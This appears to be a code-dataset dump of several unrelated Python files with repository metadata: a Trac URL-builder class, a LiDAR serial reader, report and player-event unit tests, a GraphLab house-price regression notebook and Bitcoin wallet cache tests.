absolute URLs:
>>> href = Href('http://trac.edgewall.org')
>>> href('ticket', 540)
'http://trac.edgewall.org/ticket/540'
>>> href = Href('https://trac.edgewall.org')
>>> href('ticket', 540)
'https://trac.edgewall.org/ticket/540'
In common usage, it may improve readability to use the function-calling
ability for the first component of the URL as mentioned earlier:
>>> href = Href('/trac')
>>> href.ticket(540)
'/trac/ticket/540'
>>> href.browser('/trunk/README.txt', format='txt')
'/trac/browser/trunk/README.txt?format=txt'
The ``path_safe`` argument specifies the characters that don't
need to be quoted in the path arguments. Likewise, the
``query_safe`` argument specifies the characters that don't need
to be quoted in the query string:
>>> href = Href('')
>>> href.milestone('<look,here>', param='<here,too>')
'/milestone/%3Clook%2Chere%3E?param=%3Chere%2Ctoo%3E'
>>> href = Href('', path_safe='/<,', query_safe=',>')
>>> href.milestone('<look,here>', param='<here,too>')
'/milestone/<look,here%3E?param=%3Chere,too>'
"""
def __init__(self, base, path_safe="/!~*'()", query_safe="!~*'()"):
self.base = base.rstrip('/')
self.path_safe = path_safe
self.query_safe = query_safe
self._derived = {}
def __call__(self, *args, **kw):
href = self.base
params = []
def add_param(name, value):
if isinstance(value, (list, tuple)):
for i in [i for i in value if i is not None]:
params.append((name, i))
elif value is not None:
params.append((name, value))
if args:
lastp = args[-1]
if isinstance(lastp, dict):
for k, v in lastp.items():
add_param(k, v)
args = args[:-1]
elif isinstance(lastp, (list, tuple)):
for k, v in lastp:
add_param(k, v)
args = args[:-1]
# build the path
path = '/'.join(unicode_quote(unicode(arg).strip('/'), self.path_safe)
for arg in args if arg is not None)
if path:
href += '/' + slashes_re.sub('/', path).lstrip('/')
elif not href:
href = '/'
# assemble the query string
for k, v in kw.items():
add_param(k[:-1] if k.endswith('_') else k, v)
if params:
href += '?' + unicode_urlencode(params, self.query_safe)
return href
def __getattr__(self, name):
if name not in self._derived:
self._derived[name] = lambda *args, **kw: self(name, *args, **kw)
return self._derived[name]
_printable_safe = ''.join(map(chr, xrange(0x21, 0x7f)))
def __add__(self, rhs):
if not rhs:
return self.base or '/'
if rhs.startswith('?'):
return (self.base or '/') + \
unicode_quote(rhs, self._printable_safe)
if not rhs.startswith('/'):
rhs = '/' + rhs
return self.base + unicode_quote(rhs, self._printable_safe)
if __name__ == '__main__':
import doctest, sys
doctest.testmod(sys.modules[__name__])
| 1,877 | 0 | 108 |
8471be6e1f242d055d1f1f40b27848b9460a6fca | 601 | py | Python | PC_Benewake_TFmini_LiDAR.py | Chastonay-GP/2020-raspberry-pi-water-level | ec89ca7c75a2cf3435267b3dede51266b0fff41d | [
"FSFAP"
] | null | null | null | PC_Benewake_TFmini_LiDAR.py | Chastonay-GP/2020-raspberry-pi-water-level | ec89ca7c75a2cf3435267b3dede51266b0fff41d | [
"FSFAP"
] | null | null | null | PC_Benewake_TFmini_LiDAR.py | Chastonay-GP/2020-raspberry-pi-water-level | ec89ca7c75a2cf3435267b3dede51266b0fff41d | [
"FSFAP"
] | null | null | null | import serial
import time
ser = serial.Serial('/dev/ttyUSB0',115200,timeout = 1)
ser.write(0x42)
ser.write(0x57)
ser.write(0x02)
ser.write(0x00)
ser.write(0x00)
ser.write(0x00)
ser.write(0x01)
ser.write(0x06)
while(True):
while(ser.in_waiting >= 9):
#print ("a")
if(('Y' == ser.read()) and ('Y' == ser.read())):
Dist_L = ser.read()
Dist_H = ser.read()
Dist_Total = (ord(Dist_H) * 256) + (ord(Dist_L))
for i in range (0,5):
ser.read()
#time.sleep(0.0005)
print (Dist_Total)
| 23.115385 | 61 | 0.529118 | import serial
import time
ser = serial.Serial('/dev/ttyUSB0',115200,timeout = 1)
ser.write(0x42)
ser.write(0x57)
ser.write(0x02)
ser.write(0x00)
ser.write(0x00)
ser.write(0x00)
ser.write(0x01)
ser.write(0x06)
while(True):
while(ser.in_waiting >= 9):
#print ("a")
if(('Y' == ser.read()) and ('Y' == ser.read())):
Dist_L = ser.read()
Dist_H = ser.read()
Dist_Total = (ord(Dist_H) * 256) + (ord(Dist_L))
for i in range (0,5):
ser.read()
#time.sleep(0.0005)
print (Dist_Total)
| 0 | 0 | 0 |
6a15aade8cc353754c14f8437cf9834a8d068d77 | 5,376 | py | Python | corehq/apps/reports/tests/test_sql_reports.py | dimagilg/commcare-hq | ea1786238eae556bb7f1cbd8d2460171af1b619c | [
"BSD-3-Clause"
] | null | null | null | corehq/apps/reports/tests/test_sql_reports.py | dimagilg/commcare-hq | ea1786238eae556bb7f1cbd8d2460171af1b619c | [
"BSD-3-Clause"
] | 94 | 2020-12-11T06:57:31.000Z | 2022-03-15T10:24:06.000Z | corehq/apps/reports/tests/test_sql_reports.py | dimagilg/commcare-hq | ea1786238eae556bb7f1cbd8d2460171af1b619c | [
"BSD-3-Clause"
] | null | null | null | from datetime import datetime, time
from django import test as unittest
from django.test.client import RequestFactory
from dimagi.utils.dates import DateSpan
from corehq.apps.domain.shortcuts import create_domain
from corehq.apps.users.models import WebUser
from corehq.sql_db.connections import Session
from corehq.util.dates import iso_string_to_date
from corehq.util.test_utils import softer_assert
from .sql_fixture import load_data
from .sql_reports import RegionTestReport, UserTestReport, test_report
DOMAIN = "test"
| 41.038168 | 109 | 0.635231 | from datetime import datetime, time
from django import test as unittest
from django.test.client import RequestFactory
from dimagi.utils.dates import DateSpan
from corehq.apps.domain.shortcuts import create_domain
from corehq.apps.users.models import WebUser
from corehq.sql_db.connections import Session
from corehq.util.dates import iso_string_to_date
from corehq.util.test_utils import softer_assert
from .sql_fixture import load_data
from .sql_reports import RegionTestReport, UserTestReport, test_report
DOMAIN = "test"
class BaseReportTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(BaseReportTest, cls).setUpClass()
load_data()
create_domain(DOMAIN)
cls.couch_user = WebUser.create(None, "report_test", "foobar", None, None)
cls.couch_user.add_domain_membership(DOMAIN, is_admin=True)
cls.couch_user.save()
cls.factory = RequestFactory()
@classmethod
def tearDownClass(cls):
cls.couch_user.delete(deleted_by=None)
Session.remove()
super(BaseReportTest, cls).tearDownClass()
def _get_report_data(self, report, startdate, enddate):
req = self._get_request(startdate, enddate)
rep = report(req, in_testing=True)
json = rep.json_dict['aaData']
html_data, sort_data = [], []
for row in json:
html_row, sort_row = [], []
for val in row:
if isinstance(val, dict):
html_row.append(val["html"])
sort_row.append(val["sort_key"])
else:
html_row.append(val)
sort_row.append(val)
html_data.append(html_row)
sort_data.append(sort_row)
return html_data, sort_data
def _get_request(self, startdate, enddate):
request = self.factory.get('/')
request.couch_user = self.couch_user
request.datespan = DateSpan(self.date(startdate), self.date(enddate))
return request
def date(self, d):
return datetime.combine(iso_string_to_date(d), time())
class SimpleReportTest(BaseReportTest):
def test_no_group_no_filter(self):
html_data, sort_data = self._get_report_data(test_report(UserTestReport), "2013-01-01", "2013-02-01")
self.assertEqual(len(sort_data), 1)
self.assertEqual(sort_data[0], [2, 2, 66])
def test_no_group_with_filter(self):
filters = ["date > :startdate"]
report = test_report(UserTestReport, filters=filters)
html_data, sort_data = self._get_report_data(report, "2013-01-01", "2013-02-01")
self.assertEqual(len(sort_data), 1)
self.assertEqual(sort_data[0], [1, 1, 66])
def test_with_group_no_filter(self):
keys = [["user1"], ["user2"]] # specify keys to guarantee ordering
report = test_report(UserTestReport, keys=keys, group_by=['user'])
html_data, sort_data = self._get_report_data(report, "2013-01-01", "2013-02-01")
self.assertEqual(len(sort_data), 2)
self.assertEqual(sort_data[0], ['Joe', 1, 1, 100])
self.assertEqual(sort_data[1], ['Bob', 1, 1, 50])
def test_with_group_with_filter(self):
keys = [["user1"], ["user2"]] # specify keys to guarantee ordering
filters = ["date > :startdate"]
report = test_report(UserTestReport, keys=keys, filters=filters, group_by=['user'])
html_data, sort_data = self._get_report_data(report, "2013-01-01", "2013-02-01")
self.assertEqual(len(sort_data), 2)
self.assertEqual(sort_data[0], ['Joe', 0, 1, 100])
self.assertEqual(sort_data[1], ['Bob', 1, 0, 50])
def test_extra_keys(self):
keys = [["user1"], ["user2"], ["user3"]]
report = test_report(UserTestReport, keys=keys, group_by=['user'])
html_data, sort_data = self._get_report_data(report, "2013-01-01", "2013-02-01")
self.assertEqual(len(sort_data), 3)
self.assertEqual(sort_data[0], ['Joe', 1, 1, 100])
self.assertEqual(sort_data[1], ['Bob', 1, 1, 50])
self.assertEqual(sort_data[2], ['Gill', '--', '--', '--'])
def test_formatting(self):
keys = [["user1"], ["user2"]]
report = test_report(UserTestReport, keys=keys, group_by=['user'])
html_data, sort_data = self._get_report_data(report, "2013-01-01", "2013-02-01")
self.assertEqual(len(sort_data), 2)
self.assertEqual(html_data[0], ['Joe', 1, 1, "100%"])
self.assertEqual(html_data[1], ['Bob', 1, 1, "50%"])
self.assertEqual(sort_data[0], ['Joe', 1, 1, 100])
self.assertEqual(sort_data[1], ['Bob', 1, 1, 50])
def test_multi_level_grouping(self):
keys = [
["region1", "region1_a"], ["region1", "region1_b"],
["region2", "region2_a"], ["region2", "region2_b"]
]
report = test_report(RegionTestReport, keys=keys, group_by=["region", "sub_region"])
html_data, sort_data = self._get_report_data(report, "2013-01-01", "2013-02-01")
self.assertEqual(len(sort_data), 4)
self.assertEqual(sort_data[0], ['Cape Town', 'Ronderbosch', 2, 1])
self.assertEqual(sort_data[1], ['Cape Town', 'Newlands', 0, 1])
self.assertEqual(sort_data[2], ['Durban', 'Glenwood', 1, 2])
self.assertEqual(sort_data[3], ['Durban', 'Morningside', 1, 0])
| 4,404 | 206 | 235 |
f69f04ff046fb9ac1b27d85f735f3a20981576fc | 1,213 | py | Python | tests/store/test_player_events.py | aequitas/munerator | deb1d2ed6c06d17bf3005d75a03e4f2eb7a9938e | [
"MIT"
] | null | null | null | tests/store/test_player_events.py | aequitas/munerator | deb1d2ed6c06d17bf3005d75a03e4f2eb7a9938e | [
"MIT"
] | null | null | null | tests/store/test_player_events.py | aequitas/munerator | deb1d2ed6c06d17bf3005d75a03e4f2eb7a9938e | [
"MIT"
] | null | null | null | from munerator.store import handle_event, setup_eve_mongoengine
| 22.886792 | 71 | 0.598516 | from munerator.store import handle_event, setup_eve_mongoengine
def test_add_player(db, uuid):
data = {
'id': uuid,
'guid': uuid,
'name': 'test'
}
handle_event('clientuserinfochanged', {'client_info': data}, None)
player = db.players.find_one()
assert player['name'] == data['name']
assert data['guid'] in player['guids']
def test_update_player(db, uuid):
data = {
'id': uuid,
'guid': uuid,
'name': 'test'
}
handle_event('clientuserinfochanged', {'client_info': data}, None)
player = db.players.find_one()
assert player['name'] == data['name']
data2 = {
'id': uuid,
'guid': uuid,
'name': 'test2'
}
handle_event('clientuserinfochanged', {'client_info': data2}, None)
player = db.players.find_one()
assert player['name'] == data2['name']
assert data['name'] in player['names']
def test_updated_created_fields(db, uuid):
setup_eve_mongoengine('', 0)
data = {
'name': 'test'
}
handle_event('clientuserinfochanged', {'client_info': data}, None)
player = db.players.find_one()
assert player['_updated']
assert player['_created']
| 1,077 | 0 | 69 |
2f93144ea0e7a9ec3d12b51325d8760bd959ad44 | 6,201 | py | Python | course1/week2/quiz2/PredictingHousePrices.py | eroicaleo/MachineLearningUW | c9addb23119e2db41e2a467baafe6bd2ce2acbcb | [
"MIT"
] | null | null | null | course1/week2/quiz2/PredictingHousePrices.py | eroicaleo/MachineLearningUW | c9addb23119e2db41e2a467baafe6bd2ce2acbcb | [
"MIT"
] | null | null | null | course1/week2/quiz2/PredictingHousePrices.py | eroicaleo/MachineLearningUW | c9addb23119e2db41e2a467baafe6bd2ce2acbcb | [
"MIT"
] | null | null | null |
# coding: utf-8
# #Fire up graphlab create
# In[35]:
import graphlab
# #Load some house sales data
#
# Dataset is from house sales in King County, the region where the city of Seattle, WA is located.
# In[36]:
sales = graphlab.SFrame('home_data.gl/')
# In[37]:
sales
# #Exploring the data for housing sales
# The house price is correlated with the number of square feet of living space.
# In[38]:
graphlab.canvas.set_target('ipynb')
sales.show(view="Scatter Plot", x="sqft_living", y="price")
# #Create a simple regression model of sqft_living to price
# Split data into training and testing.
# We use seed=0 so that everyone running this notebook gets the same results. In practice, you may set a random seed (or let GraphLab Create pick a random seed for you).
# In[39]:
train_data,test_data = sales.random_split(.8,seed=0)
# ##Build the regression model using only sqft_living as a feature
# In[40]:
sqft_model = graphlab.linear_regression.create(train_data, target='price', features=['sqft_living'])
# #Evaluate the simple model
# In[41]:
print test_data['price'].mean()
# In[42]:
print sqft_model.evaluate(test_data)
# RMSE of about \$255,170!
# #Let's show what our predictions look like
# Matplotlib is a Python plotting library that is also useful for plotting. You can install it with:
#
# 'pip install matplotlib'
# In[43]:
import matplotlib.pyplot as plt
get_ipython().magic(u'matplotlib inline')
# In[44]:
plt.plot(test_data['sqft_living'],test_data['price'],'.',
test_data['sqft_living'],sqft_model.predict(test_data),'-')
# Above: blue dots are original data, green line is the prediction from the simple regression.
#
# Below: we can view the learned regression coefficients.
# In[45]:
sqft_model.get('coefficients')
# #Explore other features in the data
#
# To build a more elaborate model, we will explore using more features.
# In[46]:
my_features = ['bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors', 'zipcode']
# In[47]:
sales[my_features].show()
# In[48]:
sales.show(view='BoxWhisker Plot', x='zipcode', y='price')
# Pull the bar at the bottom to view more of the data.
#
# 98039 is the most expensive zip code.
# #Build a regression model with more features
# In[49]:
my_features_model = graphlab.linear_regression.create(train_data,target='price',features=my_features)
# In[50]:
print my_features
# ##Comparing the results of the simple model with adding more features
# In[51]:
print sqft_model.evaluate(test_data)
print my_features_model.evaluate(test_data)
# The RMSE goes down from \$255,170 to \$179,508 with more features.
# #Apply learned models to predict prices of 3 houses
# The first house we will use is considered an "average" house in Seattle.
# In[52]:
house1 = sales[sales['id']=='5309101200']
# In[53]:
house1
# <img src="house-5309101200.jpg">
# In[54]:
print house1['price']
# In[55]:
print sqft_model.predict(house1)
# In[56]:
print my_features_model.predict(house1)
# In this case, the model with more features provides a worse prediction than the simpler model with only 1 feature. However, on average, the model with more features is better.
# ##Prediction for a second, fancier house
#
# We will now examine the predictions for a fancier house.
# In[57]:
house2 = sales[sales['id']=='1925069082']
# In[58]:
house2
# <img src="house-1925069082.jpg">
# In[59]:
print sqft_model.predict(house2)
# In[60]:
print my_features_model.predict(house2)
# In this case, the model with more features provides a better prediction. This behavior is expected here, because this house is more differentiated by features that go beyond its square feet of living space, especially the fact that it's a waterfront house.
# ##Last house, super fancy
#
# Our last house is a very large one owned by a famous Seattleite.
# In[61]:
bill_gates = {'bedrooms':[8],
'bathrooms':[25],
'sqft_living':[50000],
'sqft_lot':[225000],
'floors':[4],
'zipcode':['98039'],
'condition':[10],
'grade':[10],
'waterfront':[1],
'view':[4],
'sqft_above':[37500],
'sqft_basement':[12500],
'yr_built':[1994],
'yr_renovated':[2010],
'lat':[47.627606],
'long':[-122.242054],
'sqft_living15':[5000],
'sqft_lot15':[40000]}
# <img src="house-bill-gates.jpg">
# In[62]:
print my_features_model.predict(graphlab.SFrame(bill_gates))
# The model predicts a price of over $13M for this house! But we expect the house to cost much more. (There are very few samples in the dataset of houses that are this fancy, so we don't expect the model to capture a perfect prediction here.)
# In[63]:
house_zip_code = sales[sales["zipcode"] == "98039"]
# In[64]:
house_zip_code
# In[65]:
house_zip_code['price'].mean()
# In[66]:
house_zip_code_range = house_zip_code[house_zip_code.apply(lambda x: x['sqft_living'] > 2000.0 and x['sqft_living'] <= 4000.0)]
# In[67]:
house_zip_code_range.head()
# In[68]:
house_zip_code_range.num_rows()
# In[69]:
house_zip_code.num_rows()
# In[70]:
advanced_features = [
'bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors', 'zipcode',
'condition', # condition of house
'grade', # measure of quality of construction
'waterfront', # waterfront property
'view', # type of view
'sqft_above', # square feet above ground
'sqft_basement', # square feet in basement
'yr_built', # the year built
'yr_renovated', # the year renovated
'lat', 'long', # the lat-long of the parcel
'sqft_living15', # average sq.ft. of 15 nearest neighbors
'sqft_lot15', # average lot size of 15 nearest neighbors
]
# In[71]:
advanced_features_model = graphlab.linear_regression.create(train_data, target='price', features=advanced_features)
# In[72]:
print advanced_features_model.evaluate(test_data)
# In[73]:
advanced_features_model.evaluate(test_data)['rmse'] - my_features_model.evaluate(test_data)['rmse']
# In[ ]:
# In[ ]:
| 19.938907 | 260 | 0.680213 |
# coding: utf-8
# #Fire up graphlab create
# In[35]:
import graphlab
# #Load some house sales data
#
# Dataset is from house sales in King County, the region where the city of Seattle, WA is located.
# In[36]:
sales = graphlab.SFrame('home_data.gl/')
# In[37]:
sales
# #Exploring the data for housing sales
# The house price is correlated with the number of square feet of living space.
# In[38]:
graphlab.canvas.set_target('ipynb')
sales.show(view="Scatter Plot", x="sqft_living", y="price")
# #Create a simple regression model of sqft_living to price
# Split data into training and testing.
# We use seed=0 so that everyone running this notebook gets the same results. In practice, you may set a random seed (or let GraphLab Create pick a random seed for you).
# In[39]:
train_data,test_data = sales.random_split(.8,seed=0)
# ##Build the regression model using only sqft_living as a feature
# In[40]:
sqft_model = graphlab.linear_regression.create(train_data, target='price', features=['sqft_living'])
# #Evaluate the simple model
# In[41]:
print test_data['price'].mean()
# In[42]:
print sqft_model.evaluate(test_data)
# RMSE of about \$255,170!
# #Let's show what our predictions look like
# Matplotlib is a Python plotting library that is also useful for plotting. You can install it with:
#
# 'pip install matplotlib'
# In[43]:
import matplotlib.pyplot as plt
get_ipython().magic(u'matplotlib inline')
# In[44]:
plt.plot(test_data['sqft_living'],test_data['price'],'.',
test_data['sqft_living'],sqft_model.predict(test_data),'-')
# Above: blue dots are original data, green line is the prediction from the simple regression.
#
# Below: we can view the learned regression coefficients.
# In[45]:
sqft_model.get('coefficients')
# #Explore other features in the data
#
# To build a more elaborate model, we will explore using more features.
# In[46]:
my_features = ['bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors', 'zipcode']
# In[47]:
sales[my_features].show()
# In[48]:
sales.show(view='BoxWhisker Plot', x='zipcode', y='price')
# Pull the bar at the bottom to view more of the data.
#
# 98039 is the most expensive zip code.
# #Build a regression model with more features
# In[49]:
my_features_model = graphlab.linear_regression.create(train_data,target='price',features=my_features)
# In[50]:
print my_features
# ##Comparing the results of the simple model with adding more features
# In[51]:
print sqft_model.evaluate(test_data)
print my_features_model.evaluate(test_data)
# The RMSE goes down from \$255,170 to \$179,508 with more features.
# #Apply learned models to predict prices of 3 houses
# The first house we will use is considered an "average" house in Seattle.
# In[52]:
house1 = sales[sales['id']=='5309101200']
# In[53]:
house1
# <img src="house-5309101200.jpg">
# In[54]:
print house1['price']
# In[55]:
print sqft_model.predict(house1)
# In[56]:
print my_features_model.predict(house1)
# In this case, the model with more features provides a worse prediction than the simpler model with only 1 feature. However, on average, the model with more features is better.
# ##Prediction for a second, fancier house
#
# We will now examine the predictions for a fancier house.
# In[57]:
house2 = sales[sales['id']=='1925069082']
# In[58]:
house2
# <img src="house-1925069082.jpg">
# In[59]:
print sqft_model.predict(house2)
# In[60]:
print my_features_model.predict(house2)
# In this case, the model with more features provides a better prediction. This behavior is expected here, because this house is more differentiated by features that go beyond its square feet of living space, especially the fact that it's a waterfront house.
# ##Last house, super fancy
#
# Our last house is a very large one owned by a famous Seattleite.
# In[61]:
bill_gates = {'bedrooms':[8],
'bathrooms':[25],
'sqft_living':[50000],
'sqft_lot':[225000],
'floors':[4],
'zipcode':['98039'],
'condition':[10],
'grade':[10],
'waterfront':[1],
'view':[4],
'sqft_above':[37500],
'sqft_basement':[12500],
'yr_built':[1994],
'yr_renovated':[2010],
'lat':[47.627606],
'long':[-122.242054],
'sqft_living15':[5000],
'sqft_lot15':[40000]}
# <img src="house-bill-gates.jpg">
# In[62]:
print my_features_model.predict(graphlab.SFrame(bill_gates))
# The model predicts a price of over $13M for this house! But we expect the house to cost much more. (There are very few samples in the dataset of houses that are this fancy, so we don't expect the model to capture a perfect prediction here.)
# In[63]:
house_zip_code = sales[sales["zipcode"] == "98039"]
# In[64]:
house_zip_code
# In[65]:
house_zip_code['price'].mean()
# In[66]:
house_zip_code_range = house_zip_code[house_zip_code.apply(lambda x: x['sqft_living'] > 2000.0 and x['sqft_living'] <= 4000.0)]
# In[67]:
house_zip_code_range.head()
# In[68]:
house_zip_code_range.num_rows()
# In[69]:
house_zip_code.num_rows()
# In[70]:
advanced_features = [
'bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors', 'zipcode',
'condition', # condition of house
'grade', # measure of quality of construction
'waterfront', # waterfront property
'view', # type of view
'sqft_above', # square feet above ground
'sqft_basement', # square feet in basement
'yr_built', # the year built
'yr_renovated', # the year renovated
'lat', 'long', # the lat-long of the parcel
'sqft_living15', # average sq.ft. of 15 nearest neighbors
'sqft_lot15', # average lot size of 15 nearest neighbors
]
# In[71]:
advanced_features_model = graphlab.linear_regression.create(train_data, target='price', features=advanced_features)
# In[72]:
print advanced_features_model.evaluate(test_data)
# In[73]:
advanced_features_model.evaluate(test_data)['rmse'] - my_features_model.evaluate(test_data)['rmse']
# In[ ]:
# In[ ]:
| 0 | 0 | 0 |
1f86701824cf61a12df75ebaea242b4272d39e29 | 18,076 | py | Python | tests/wallet/test_cache_manager.py | febuiles/two1-python | 88704487dba7715f97a0980781d4c0efb2ea7fc4 | [
"BSD-2-Clause-FreeBSD"
] | 415 | 2016-06-10T00:46:55.000Z | 2021-10-16T00:56:06.000Z | tests/wallet/test_cache_manager.py | febuiles/two1-python | 88704487dba7715f97a0980781d4c0efb2ea7fc4 | [
"BSD-2-Clause-FreeBSD"
] | 25 | 2016-06-11T13:48:59.000Z | 2021-01-05T11:19:30.000Z | tests/wallet/test_cache_manager.py | febuiles/two1-python | 88704487dba7715f97a0980781d4c0efb2ea7fc4 | [
"BSD-2-Clause-FreeBSD"
] | 109 | 2016-06-11T05:17:05.000Z | 2021-12-22T11:02:22.000Z | import inspect
import os.path
import time
from two1.blockchain.twentyone_provider import TwentyOneProvider
from two1.bitcoin.hash import Hash
from two1.wallet.cache_manager import CacheManager
from two1.wallet.wallet_txn import WalletTransaction
this_file_path = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
cm = CacheManager()
dp = TwentyOneProvider()
| 46.112245 | 796 | 0.750553 | import inspect
import os.path
import time
from two1.blockchain.twentyone_provider import TwentyOneProvider
from two1.bitcoin.hash import Hash
from two1.wallet.cache_manager import CacheManager
from two1.wallet.wallet_txn import WalletTransaction
this_file_path = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
cm = CacheManager()
dp = TwentyOneProvider()
def test_addresses():
cm.insert_address(0, 0, 0, "15qCydrcqURADXJHrtMW9m6SpPTa3kqkQb")
cm.insert_address(0, 0, 1, "15hyvVXH2eJnakwhpqKBf5oTCa3o2bp8m8")
cm.insert_address(0, 0, 19, "17TNXJSWjBdMpHAkSfuyfVKSvb3rLuWZqQ")
cm.insert_address(0, 1, 0, "1BbPtYsbBPFRCwnU5RuMTttraghXQ5JSZm")
cm.insert_address(0, 1, 1, "1JuFprygqrra7vwYzrpBkGUbXjYao3RaR3")
cm.insert_address(0, 1, 2, "16iY4btKxq9tz7sSZnva3691RYigcWDaSv")
cm.insert_address(0, 1, 3, "1MDXXbB8JBV4bZU4buzxV456RAFqL7Z93f")
cm.insert_address(0, 1, 4, "18vZXvhQAg8Fd8Ym7fbDUiBQS8o1iYDnkT")
cm.insert_address(0, 1, 5, "1A9Gn3srogH6nNSqyWRf4YSBvvarvJzepc")
cm.insert_address(0, 1, 6, "1FHkYaLSQ9A32PAopjLiBdZr1XQ5TueJWr")
cm.insert_address(0, 1, 7, "1FAqCWr2EkAz43JzPRsdqLKBQeLJo4Tc7M")
cm.insert_address(0, 1, 8, "12gR11fhqeDWpERmTfggVKUpDLfkq1dKbZ")
cm.insert_address(0, 1, 9, "1Pr6wKbrfbtqacm4aDhN4zscMTAbc7cztz")
assert 0 in cm._address_cache
assert list(cm._address_cache[0].keys()) == [0, 1]
assert len(cm._address_cache[0][0].keys()) == 3
assert list(cm._address_cache[0][0].keys()) == [0, 1, 19]
assert len(cm._address_cache[0][1].keys()) == 10
assert cm.get_address(0, 0, 1) == "15hyvVXH2eJnakwhpqKBf5oTCa3o2bp8m8"
assert cm.get_address(0, 0, 19) == "17TNXJSWjBdMpHAkSfuyfVKSvb3rLuWZqQ"
assert cm.get_address(0, 1, 7) == "1FAqCWr2EkAz43JzPRsdqLKBQeLJo4Tc7M"
chain_addrs = cm.get_addresses_for_chain(0, 0)
assert len(chain_addrs) == 3
for a in ["15qCydrcqURADXJHrtMW9m6SpPTa3kqkQb",
"15hyvVXH2eJnakwhpqKBf5oTCa3o2bp8m8",
"17TNXJSWjBdMpHAkSfuyfVKSvb3rLuWZqQ"]:
assert a in chain_addrs
chain_addrs = cm.get_addresses_for_chain(0, 1)
assert len(chain_addrs) == 10
assert cm.get_chain_indices(0, 0) == [0, 1, 19]
assert cm.get_chain_indices(0, 1) == list(range(10))
def test_txns():
txn = WalletTransaction.from_hex('01000000029ccb0665ec780f8b05bf2315a48dfb154dc41f91e8046a59f1c75656826dea5d000000006b483045022100f4d2161473f9d0ba4b5cdbc9e5b7b1d8fca32e3b6bede307352bef6aaa3a08cd022023d8444f78f69de6fd0f6cc391a7ca4de3dc4181220932d01511eb1129fee09e01210328bd51733a7d5bee05368680adef9aaa3f9bb716ec716d5896b1d80afb734d6cffffffff2424cb910235b2059d59023aecfebf6fce4eee31c637e9a0b350491849688727020000006a473044022072de3d707f98adfed3266e0261750cd7b5162732e525d7df17f4e55a55e953b902205046b597acf7acf41e725b459ba6cfe8c03a9d877375cdf483cab9620f92961101210291cbb1304614d86b15f4e8f39e9d8299cd0304ff8b81b5bcf6d9a6f32be649bbffffffff0240420f00000000001976a91434fe777d676fceb3509584c1d7b9f13ee56514d488ace05a0000000000001976a9145237ba33122495420711b3f2cc0463dbb24c9d3988ac00000000') # nopep8
txn.block = 374440
txn.block_hash = Hash('0000000000000000038ee0066680705455d500f287f6c56db7a979c2426a4c02')
txn.confirmations = 7533
cm.insert_txn(txn)
txid = "3779f27a81cdbc435ac258ce5076c211e7a953027aab42573b1b7ce9e50abe8e"
assert txid in cm._txn_cache
in_addrs = ["1DpCouKa2evX3f2aELUy7iNdsrYuLLaqWy",
"1GcmBmvYWJKLFHxrTtx5DqQLV7oHQAkH2c"]
out_addrs = [("15qCydrcqURADXJHrtMW9m6SpPTa3kqkQb", 1000000),
("18VjAjZ7Au8U75LCHT7aH7mTwKETZwHTpi", 23264)]
assert len(cm._txns_by_addr.keys()) == 4
for i, a in enumerate(out_addrs):
assert a[0] in cm._txns_by_addr
assert list(cm._deposits_for_addr[a[0]][txid]) == [i]
for i, a in enumerate(in_addrs):
assert list(cm._spends_for_addr[a][txid]) == [i]
# Check input and output caches
assert txid in cm._inputs_cache
assert len(cm._inputs_cache[txid]) == 2
assert txid in cm._outputs_cache
assert len(cm._outputs_cache[txid]) == 2
assert cm._outputs_cache[txid][0]['output'] is not None
assert cm._outputs_cache[txid][1]['output'] is not None
assert cm._outputs_cache[txid][0]['status'] == CacheManager.UNSPENT
assert cm._outputs_cache[txid][1]['status'] == CacheManager.UNSPENT
out_txid1 = "5dea6d825656c7f1596a04e8911fc44d15fb8da41523bf058b0f78ec6506cb9c"
assert out_txid1 in cm._outputs_cache
assert cm._outputs_cache[out_txid1][0]['status'] == CacheManager.SPENT
out_txid2 = "27876849184950b3a0e937c631ee4ece6fbffeec3a02599d05b2350291cb2424"
assert out_txid2 in cm._outputs_cache
assert len(cm._outputs_cache[out_txid2].keys()) == 1
assert cm._outputs_cache[out_txid2][2]['status'] == CacheManager.SPENT
assert cm.has_txns()
assert cm.has_txns(0)
assert not cm.has_txns(1)
assert cm.have_transaction(txid)
assert not cm.have_transaction(out_txid1)
assert not cm.have_transaction(out_txid2)
assert cm.get_transaction(txid) == txn
assert cm.get_transaction(out_txid1) is None
assert cm.get_transaction(out_txid2) is None
# Check balances on addresses
addr_balances = cm.get_balances([a[0] for a in out_addrs])
for addr, exp_bal in out_addrs:
assert addr_balances[addr] == exp_bal
# Add a second transaction that deposits into addresses we have,
# but insert it as unconfirmed
txn_hex = "01000000028a9acc005a2158758e44242eee8c18fee7a43cda39a358cc783fb578cfa7cf5f000000006a47304402204a00fcb746f90095c1c50e048f1b0616b421617ca27a7a7465d4086a1623731802202404d0fce1b74f41ce1e3c63f61c8574c8cf2a5eae24ac4df714775168a9118c012102d8bfe3fd2d01f3a2b1380c34ccadcd318cafd1246f41258d7d244f409fb44c93ffffffff15857ef158778f603d34bcff74bd7935cb9d6b4a0147eea008be3f67bd395830020000006a4730440220466f93d784aa24bf497929433777fa283a7cd0000625179d3e9f5c75db4ad10f022022857a607665408a5521cbdf145c1fecd85c427ccf939c49f9a0d828a934e2530121021b5c9a9e6c97b4222c97da5a642e3531bce01b757cfdc9b29ac7d1cbf2d10710ffffffff0240420f00000000001976a91433a0a86dd9dab9902157d8d64e05fc8e0dfba16388ac7a1d0300000000001976a914134ca7427089b8f661efc9806a8418f72e57167f88ac00000000" # nopep8
txn = WalletTransaction.from_hex(txn_hex)
cm.insert_txn(txn)
txid = "d24f3b9f0aa7b6484bcea563f4c254bd24e8163906cbffc727c2b2dad43af61e"
assert txid in cm._txn_cache
in_addrs = ["1Ezv6YmYsZvALUaRcZRf8hBdxYni6cm78X",
"16Mcvb7fYhif94d1RHCn5AE2dm1oXCGnH6"]
out_addrs = [("15hyvVXH2eJnakwhpqKBf5oTCa3o2bp8m8", 1000000),
("12m3fcaabUgYwWcodgVZUGH6ntFqVrHk5C", 204154)]
for i, a in enumerate(out_addrs):
assert a[0] in cm._txns_by_addr
assert list(cm._deposits_for_addr[a[0]][txid]) == [i]
for i, a in enumerate(in_addrs):
assert list(cm._spends_for_addr[a][txid]) == [i]
